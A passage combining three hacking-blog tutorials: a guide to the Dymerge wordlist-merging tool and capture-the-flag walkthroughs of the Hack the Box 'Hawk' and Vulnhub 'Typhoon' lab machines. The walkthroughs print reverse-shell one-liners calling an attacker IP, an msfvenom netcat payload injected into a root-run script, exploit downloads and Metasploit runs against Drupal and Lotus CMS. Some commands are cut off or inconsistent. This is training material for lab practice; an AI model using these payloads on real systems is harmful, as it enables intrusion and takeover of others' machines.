Comprehensive Guide on the Dymerge

Hello friends! This article is comprehensive guide on the Dymerge tool. This is a handy little tool that helps you manage all the dictionaries that you’ve created reading through our blog and using all the amazing tools we’ve written about.

Table of Content

§  What is Dymerge

§  Installing and Launching Dymerge

§  Standard Merge

§  Fast Mode

§  Removing Duplicates

§  Reverse Listing

§  Alphabetic and Numeric Sorting

§  Defining Output

§  Including Characters

§  Compressing Output

Introduction to Dymerge

Dymerge is a tool that gives you the ability to manage dictionaries. By manage we mean it lets you gives the ability to reshape and merge them. Reshaping and merging may seem trivial but considering the fact that you could be dealing with millions of words, even the smallest of operation can turn into a mammoth and complicated task.

Installing and Launching Dymerge

We can install Dymerge from GitHub and launch it in two simple commands. We have used the “– h” flag to display the various options Dymerge has to offer.

git clone https://github.com/k4m4/dymerge.git

./dymerge.py

Standard Merge

We hope you have a few dictionaries handy to follow through with what we are doing. This a standard merge where we specify the paths to 2 different dictionaries and Dymerge combines them.

To avoid any confusion, the command is “./dymerge.py” followed by the path of the first dictionary, then a space and the path to the second dictionary. The output by default will be in a file named “dymerged.txt”

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt

Fast Mode

Arguably if the dictionaries are very large, performing any operation on them will take time. The person who made Dymerge thought of this conundrum and gave us a way to speed up the process by using the “-f” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt –f

Removing Duplicates

A lot of the dictionary making software’s follow the same logic, so there are bound to be similar words from time to time. Dymerge gives us the option to remove duplicate words from dictionaries while combining them. To achieve this, we will be using the “-u” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -u –f

Reverse Listing

Dymerge gives us the option to reverse the order of the words in the dictionaries that we merge, this mean that the first word in the new dictionary will be last word of the second dictionary.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -r –f

Alphabetic and Numeric Sorting

This option lets us sort words alphabetically, it also sorts numbers by following the progression of a number line from left to right when merging 2 dictionaries to 1. We will be using the “-s” flag to perform this operation.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s –f

Defining Output

So far we have been letting Dymerge save the output using it’s default settings, this time we will define the file name and destination of the output by using the “-o” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -o /root/output.txt

Including Characters

Just in case we find that we need something specific added to the dictionary, we can use the “-I” flag. Any characters placed after using the include flag are added to the dictionary.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -i raj

 

And here we see “raj” being added to the dictionary.

Compressing Output

Dictionaries can be pretty big in size, especially when you’re talking about a unified dictionary comprised of multiple dictionaries. Dymerge gives us the option to compress our output using the “-z” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f –z zip

All said and done, this is a pretty neat little tool to use when you’re dealing with multiple dictionaries and need something to bring a little bit of order. The functions it performs may seem simple of the face of it but are without a doubt very useful.

Stay tuned for more articles on the latest and greatest in hacking.

Hack the Box: Hawk Walkthrough

Today we are going to solve another CTF challenge “HawkNew”. HawkNew is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt

Note: Since these labs are online available therefore they have static IP. The IP of HawkNew is 10.10.10.102

Penetration Methodology:

§  Port scanning and IP discovery

§  Anonymous FTP Login

§  Checking file type

§  Getting Login Credentials

§  Browsing IP through port 80

§  Exploiting Drupal

§  Reading First Flag User.txt

§  Getting Login Credentials

§  Spawning TTY Shell

§  Searching exploit via Searchsploit

§  Getting root Access

§  Reading Final Flag Root.txt

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and running services.

nmap -A 10.10.10.102

The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082(h2 database http console).

From the NMAP Scan output we saw that ftp Port 21 is Open and the next thing that catches our eyes is it so it has Anonymous login allowed.

ftp 10.10.10.102

We easily connected to ftp through Anonymous Login. Moving on, after navigating through multiple directories we found a hidden file i.e. “.drupal.txt.enc “and then we transferred the file to our local machine.

Since .drupa.txt.enc is encrypted. Let’s check the file type using ‘file’ command.

file.drupal.txt.enc

It came out to be openssl encoded data with salted password. Clearly we need to decrypt the file to get any further clue.

To crack this file, we have used an openssl bruteforce tool which is easily available on github. You can download it from the given below link or can run the following command for downloading and script execution.

git clonehttps://github.com/deltaclock/go-openssl-bruteforce.git

./openssl-brute --file /root/.drupal.txt.enc

Boom!! We have successfully cracked the file and the Password Hint we got is “PencilKeyboardScanner123” this could be the password for CMS Login. Let’s Check it.

As port 80 is running http server, we open the target machine’s IP address in our browser and found out it’s a Drupal Login Page. To Login this page we have used a Basic Username: admin and Password: PencilKeyboardScanner123.

Oh yeah!! We have successfully logged into admin dashboard. Now go to modules and then enable the check box for Path and PHP filter.

After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.

Here we have written one-liner code for PHP reverse shell with the help of Pentest Monkey website.

&1|nc 10.10.14.10 1234 >/tmp/f"); ?>

Then select the Text format as “PHPCode”. Before saving it you should start netcat listener on the listening port. So, once the code is executed it will establish a reverse connection.

nc -lvp 1234

We got a reverse connection of victim’s machine on our netcat listener. To spawn the proper shell we have used python3 bin bash one liner.

python3 -c ‘import pty;pty.spawn(“/bin”bash”)’

Inside /home/denial we have got to User.txt flag, now time to find the root flag. While exploring through directories, we thought of reading the contents of the “settings.php” file, in this file we found the password: drupal4hawk

cat settings.php | grep Password

Then with the following command we switch the user and logging in as user daniel.

su daniel

Password: drupal4hawk

Here we have used Simple phyton3 commands to escape the python3 interpreter.

>>import pty

>>pty.spawn(‘/bin/bash’)

From Nmap scan output we notice that “H2 database running on port 8082”, therefore we search out for H2 database exploit in searchsploit.

searchsploit H2 database

It came out to be a Remote Code Execution. The exploit we have used is highlighted, after that we have copied the exploit 45506.py in the /root directory and run a Python server to download the file in the target machine.

searchsploit -m 45506

python -m SimpleHTTPServer 8080

Afterwards we have downloaded our exploit 45506.py in the /tmp directory of target machine. Then Grant the FULL permission to the exploit and execute it using command.

cd /tmp

wget http://10.10.14.10:8080/45506.py

chmod 777 455506.py

python3 45506.py –H 127.0.0.1:8082

id

Finally!! We have got the root access. Now let’s go and get the “root.txt”. We take a look at the content of the file and find our final flag.

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Typhoon: Vulnhub Walkthrough

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.

Flag: root-flag

Since there are multiple ways in which we can exploit this machine. Therefore we have used two methods to capture the flag as follows:

Method 1- Using a LOCAL PRIVILEGE ESCALATION SHELL after logging into SSH.

Let’s Begin with the Walkthrough!!

Let’s start off with scanning the network to find our targets IP.

netdiscover

We found our target IP –> 192.168.1.105
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.101
The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgrespl), 8080(http).
Further we notice that there is a entry /monoadmin/ in robot.txt as it might be useful.

We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. This could be another way of exploiting this machine. But will see to it later on.

Moving on, Since port 80 is also open. So, we browsed the found directory /mongoadmin/ into the browser. The result displayed is shown in the image. Here we set change database to credentials(84mb). It will display a link of 2 Credentials. Click on it.

Clicking on the 2 Credential link will give us 2 Credentials [username]:typhoon and [password]:789456123 . These credentials might be a great help for further enumeration.

After a sometime, we just strike with a idea WHY NOT USE THE FOUND CREDS TO LOGIN WITH SSH?. Since SSH port 22 is also open.

Than we simply logged in SSH with CREDENTIALS Username:typhoon & Password: 789456123

ssh typhoon@192.168.1.101

Then we checked system information and found out Ubuntu 14.04 is running on target machine. Good thing we were familiar with an exploit for Ubuntu 14.04.

Next we look for an exploit for ubuntu 14.04 using searchsploit. The exploit we have used have highlighted, after that we have copied the exploit 37292.c in the /root/ directory. Executing a Python server to download the file in the target machine.

Afterwards we have downloaded our exploit 37292.c in the /tmp directory. After compilation and granting permissions to the exploit. We have executed it.

Booyeah!! We have got the root access and found our FLAG. We take a look at the content of the file and greeted with a congratulatory message.  

Method 2

Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse connection to get root access.

Let’s Begin with the Walkthrough!!

Since in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So let’s browse the Target IP on port 8080 on the browser.

We are very fimiliar with Tomcat Server Login using manager webapp due to our previous lab experiences. Without wasting time we straight away logged into Tomcat Server using Metasploits Tomcat Manager using the Default credentials for Tomcat Server Login.

[username]:tomcat

[password]:tomcat

Oh Yeah! We have got the meterpreter. After spending a lot of time of enumeration, we found a directory /tab which consist of file script.sh that was owned by root and has FULL Permission. So we thought of inserting a malicious code in script.sh.

 Moving on!! We need to create a bash code using Msfvenom:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R

After that, append the above generated malicious code in the script.sh file.

echo “mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0

/tmp/vvwjo 2>&1; rm /tmp/vvwjo” > script.sh

Since the malicious code got executed with the script.sh file. Therefore we got a reverse shell on our netcat listener.

Yeah!! We have got the root access and found root-flag. We take a look at the content of the file and greeted with a congratulatory message.

3^rd Method:Exploiting Drupal CMS

Unfortunately on exploring port 80 we didn’t observe any remarkable things, therefore, we try to enumerate web directory with the help of Dirb tool.

dirb http://192.168.1.101

It was wonderful to observe that there was two CMS  as highlighted in the below image.

On exploring /Drupal in the web browser, it put up the following web page which was associated to Drupal cms.

Without wasting must time, we chase towards metasploit and run following module to exploit Drupal cms.

use exploit/unix/webapp/drupal_drupalgeddon2

msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101

msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal

msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit

Booom!! It was terrific moment to see meterpreter session of the target machine. Now for the post exploitation you can follow above methodology which we have already discussed in 1^st method.

4^th Method: Exploiting Lotus CMS

Scroll up and kindly notice the result which we have obtain from the dirb scan, there we had found two CMS. We had already exploit Drupal, now let’s go for next CMS and try to exploit it, if possible

So on exploring /cms in the web browser, it put up the following web page which was associated to Lotus cms.

Without wasting must time, again we chase towards metasploit and run following module to exploit lotus cms.

use exploit/multi/http/lcms_php_exec

msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101

msf exploit(multi/http/lcms_php_exec) > set uri /cms/

msf exploit(multi/http/lcms_php_exec) > exploit

Great, we have own another meterpreter session of the target machine. Now for the post exploitation you can follow above methodology which we have already discussed in 1st method.